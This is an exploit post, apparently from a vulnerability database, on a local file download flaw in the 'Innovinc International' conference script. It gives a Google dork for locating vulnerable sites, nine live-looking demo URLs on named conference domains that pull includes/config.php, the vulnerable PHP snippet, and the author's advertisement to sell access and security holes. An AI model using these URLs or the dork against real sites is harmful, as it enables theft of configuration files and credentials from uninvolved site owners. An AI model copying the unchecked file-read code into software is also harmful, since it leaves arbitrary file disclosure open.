Innovinc International Script Local File Download Vulnerability

2020.02.14

Milad Hacking (IR)

Risk: Medium

Local: Yes

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:/importantdates intext:"Innovinc International"

/***********************************************************************************
** Exploit Title:   Innovinc International  Script Local File Download Vulnerability
**
** Exploit Author:  Milad Hacking
**
** Vendor Homepage : https://innovinc.org/
**
** Version : 1.1
**
** Google Dork : inurl:/importantdates intext:"Innovinc International"
**
** Date: 2020-02-13
**
** Tested on:  Kali Linux  /  lceweasel
**
***********************************************************************************
** Demo :

https://wns2020.org/download.php?file=includes/config.php

https://www.ifhn-2020.org/download.php?file=includes/config.php

https://www.wccrt.com/download.php?file=includes/config.php

https://www.idf-2020.org/download.php?file=includes/config.php

https://alzheimers-dementia.org/download.php?file=includes/config.php

https://geology-earthscience.com/download.php?file=includes/config.php

https://2020cce.com/download.php?file=includes/config.php

https://arc-2020.org/download.php?file=includes/config.php

https://icmsn2020.com/download.php?file=includes/config.php

***********************************************************************************
***********************************************************************************
** Vulnerability code :

<?php
$file = $_GET['file'];
if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/pdf');
    header('Content-Disposition: attachment; filename='.$_GET['newFile']);
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);
    exit;
}
?>

***********************************************************************************
** Special thanks to:  iliya Norton - Milad Hacking - N3TC4T - Nazila Blackhat - Babak Kh4t4R
Mahdi CocAin - Mohammad Samiyi <3
***********************************************************************************
Sell Access And Security Holes
https://fullsec.org
https://telegram.me/Milad_Hacking
Https://telegram.me/TheHackings
http://instagram.com/Milad.Hacking
milad.hacking.blackhat@Gmail.com

***********************************************************************************

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Innovinc International Script Local File Download Vulnerability

Dork: inurl:/importantdates intext:"Innovinc International"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.